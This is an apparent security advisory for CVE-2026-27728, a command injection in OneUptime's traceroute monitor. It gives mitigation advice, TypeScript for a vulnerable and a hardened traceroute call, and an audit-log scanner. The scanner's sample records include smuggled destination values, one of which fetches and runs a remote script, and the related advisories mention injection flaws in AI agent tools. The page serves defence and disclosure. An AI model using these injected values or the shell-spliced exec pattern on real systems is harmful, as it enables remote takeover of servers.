OneUptime Command Injection (CVE-2026-27728)
CVE-2026-27728
OneUptime is a solution for monitoring and managing online services. Prior to version 10.0.7, an OS command injection vulnerability in `NetworkPathMonitor.performTraceroute()` allows any authenticated...
Overview
A critical security vulnerability has been identified in the OneUptime monitoring platform. This flaw allows authenticated users to execute arbitrary commands on the underlying server hosting a OneUptime Probe, potentially leading to a full system compromise.
Vulnerability Details
In plain terms, this is an OS command injection. In affected versions, the code path that runs a network traceroute check did not validate the user-supplied “destination” of a network path monitor, so any authenticated user could place shell metacharacters (for example `;`, `|` or `$(...)`) in that field.
When the Probe’s performTraceroute() function ran, it built a shell command line containing that value verbatim and handed it to the operating system shell. The shell then ran not only the intended traceroute but whatever additional commands followed the metacharacters, with the privileges of the Probe process. Because execution happens on the Probe host, the application’s own authorization checks offer no protection once a user is permitted to create or edit such a monitor.
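The shape of the bug described above, beside a hardened form, as an added example in TypeScript. This is illustrative code written for this page, not OneUptime's source: the function names, the traceroute flags, the timeout and the hostname rule are assumptions.

```typescript
// Added example: the vulnerable shape described above and a hardened replacement.
// Illustrative only; function names, flags and the timeout are assumptions,
// not OneUptime's source.
import { exec, execFile } from "node:child_process";
import { promisify } from "node:util";
import { isIP } from "node:net";

// VULNERABLE: the user-controlled destination is spliced into a shell command
// line, so a value such as `example.com; id` makes the shell run `id` as well.
function buildVulnerableTracerouteCommand(destination: string): string {
  return `traceroute -n ${destination}`;
}

// Never call this with untrusted input; shown only to make the bug concrete.
function performTracerouteVulnerable(destination: string): void {
  exec(buildVulnerableTracerouteCommand(destination), (_err, stdout) => {
    console.log(stdout);
  });
}

// HARDENED, step 1: allowlist the destination. A traceroute target is a
// hostname made of RFC 1123 labels or an IP literal; anything else is rejected.
const HOSTNAME_RE =
  /^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$/i;

function isSafeDestination(destination: string): boolean {
  return isIP(destination) !== 0 || HOSTNAME_RE.test(destination);
}

// HARDENED, step 2: build an argv and use execFile, which passes arguments to
// the program directly and never involves a shell. Validation still matters:
// without it a destination beginning with "-" could be read as an option.
function buildSafeTracerouteArgv(destination: string): { file: string; args: string[] } {
  if (!isSafeDestination(destination)) {
    throw new Error(`Rejected traceroute destination: ${JSON.stringify(destination)}`);
  }
  return { file: "traceroute", args: ["-n", "-w", "2", destination] };
}

// The spawn itself: no shell, validated argv, bounded runtime.
async function performTracerouteSafely(destination: string): Promise<string> {
  const { file, args } = buildSafeTracerouteArgv(destination);
  const { stdout } = await promisify(execFile)(file, args, { timeout: 60_000, encoding: "utf8" });
  return stdout;
}
```

The important design choice is the order: reject anything that is not a hostname or IP literal first, then spawn without a shell. Stripping "dangerous" characters from the string and still calling `exec` leaves the shell in the loop and is the kind of fix that gets bypassed.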
Impact and Risk
The impact of this vulnerability is severe (CVSS Score: 9.9 - CRITICAL). A successful exploit could allow an attacker with standard project user credentials to:
- Gain complete control over the Probe server.
- Install malware, ransomware, or cryptominers.
- Steal sensitive data from the server or connected systems.
- Use the compromised server as a foothold to attack other internal network resources.
- Disrupt monitoring services and hide other malicious activity.
Any organization running an affected OneUptime instance is at risk from every account that holds a project role on it; exposing the instance to the internet widens that risk to anyone who obtains or phishes such an account.
Remediation and Mitigation
Immediate action is required to protect your systems.
Primary Fix: Upgrade. The only complete remediation is to upgrade your OneUptime installation to version 10.0.7 or later. This version contains the necessary patches to validate user input and prevent command injection. Follow your standard procedures for testing and deploying updates to the OneUptime application.
Temporary Mitigation (If Upgrade is Delayed): If an immediate upgrade is not possible, consider these temporary measures to reduce risk:
- Restrict Access: Immediately review and minimize the number of users with “Member” or higher permissions in your OneUptime projects. Only essential personnel should have access.
- Network Segregation: Ensure your OneUptime Probe servers are placed on isolated network segments with strict firewall rules, limiting their ability to communicate with other critical internal systems.
- Monitor Logs: On the Probe hosts, watch for the traceroute command spawning child processes other than traceroute, or for unexpected outbound connections from the Probe process. In the application, review audit logs for network path monitors whose destination contains anything other than a hostname or IP address, and note which account saved them.
Important Note: These are temporary risk-reduction steps and do not eliminate the vulnerability. Upgrading to the patched version is the only definitive solution.
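The log-monitoring step above, as an added example (not OneUptime's own tooling): a triage scan over constructed audit records in a hypothetical JSON-lines format that flags network path monitor destinations containing shell metacharacters and attributes them to the account that saved them. The field names, the `monitor.save` action and the log format are assumptions made for this example.

```typescript
// Added example: triage scan over monitor-change audit records.
// The JSON-lines format and field names below are assumptions for this example,
// not OneUptime's real audit-log schema.

// Constructed sample records (not real log data). Two of them carry injected
// destinations; one is a Website monitor whose URL is legitimately full of
// punctuation and must not be flagged.
const SAMPLE_AUDIT_LOG: string[] = [
  '{"ts":"2026-03-01T10:00:00Z","actor":"ops@example.org","projectId":"p1","action":"monitor.save","monitorType":"NetworkPath","destination":"api.example.org"}',
  '{"ts":"2026-03-01T10:05:12Z","actor":"dev@example.org","projectId":"p1","action":"monitor.save","monitorType":"NetworkPath","destination":"10.20.30.40; curl http://203.0.113.5/x | sh"}',
  '{"ts":"2026-03-01T10:06:40Z","actor":"dev@example.org","projectId":"p1","action":"monitor.save","monitorType":"Website","destination":"https://shop.example.org/health?x=1&y=2"}',
  '{"ts":"2026-03-01T10:09:03Z","actor":"contractor@example.org","projectId":"p2","action":"monitor.save","monitorType":"NetworkPath","destination":"$(id)"}',
  '{"ts":"2026-03-01T10:11:30Z","actor":"ops@example.org","projectId":"p1","action":"monitor.save","monitorType":"NetworkPath","destination":"2001:db8::1"}',
  "garbage line that is not JSON",
];

// For triage a denylist of shell metacharacters is enough: a legitimate hostname
// or IP address never contains any of these. (Prevention inside the application
// should use an allowlist instead; denylists are easy to get wrong.)
const SHELL_META_RE = /[;&|`$(){}<>\\'"\s]/;

interface Finding {
  ts: string;
  actor: string;
  projectId: string;
  destination: string;
}

function parseAuditLine(line: string): Record<string, unknown> | null {
  try {
    const value: unknown = JSON.parse(line);
    return typeof value === "object" && value !== null ? (value as Record<string, unknown>) : null;
  } catch {
    return null; // malformed lines are skipped, not fatal
  }
}

// Returns every NetworkPath monitor save whose destination could reach a shell.
function findSuspiciousTracerouteDestinations(lines: string[]): Finding[] {
  const findings: Finding[] = [];
  for (const line of lines) {
    const rec = parseAuditLine(line);
    if (!rec || rec.monitorType !== "NetworkPath") continue;
    const destination = rec.destination;
    if (typeof destination !== "string" || !SHELL_META_RE.test(destination)) continue;
    findings.push({
      ts: String(rec.ts ?? ""),
      actor: String(rec.actor ?? "unknown"),
      projectId: String(rec.projectId ?? ""),
      destination,
    });
  }
  return findings;
}

// Count findings per account so the accounts to suspend come out first.
function countByActor(findings: Finding[]): Map<string, number> {
  const counts = new Map<string, number>();
  for (const f of findings) counts.set(f.actor, (counts.get(f.actor) ?? 0) + 1);
  return counts;
}

for (const f of findSuspiciousTracerouteDestinations(SAMPLE_AUDIT_LOG)) {
  console.log(`${f.ts} project=${f.projectId} actor=${f.actor} destination=${JSON.stringify(f.destination)}`);
}
```

A hit from this scan on an unpatched instance should be treated as a Probe host compromise until the process history of that host says otherwise, since the injected command ran the moment the monitor executed.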
Related Advisories
An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 4.4.0 through 4.4.8 may allow attacker to execute unauthorized code ...
Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in authentication helper execution where helper configuration values are executed using shell=true without ...
PraisonAI is a multi-agent teams system. From version 4.5.15 to before version 4.5.69, the --mcp CLI argument is passed directly to shlex.split() and forwarded through the call chain to anyio.open_pro...
node-tesseract-ocr is an npm package that provides a Node.js wrapper for Tesseract OCR. In all versions through 2.2.1, the recognize() function in src/index.js is vulnerable to OS Command Injection. T...